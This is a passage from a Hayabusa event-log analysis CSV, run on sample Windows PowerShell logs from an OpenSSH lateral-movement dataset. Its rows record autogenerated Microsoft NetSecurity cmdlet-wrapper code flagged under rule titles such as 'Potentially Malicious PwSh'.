$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.740 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.741 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 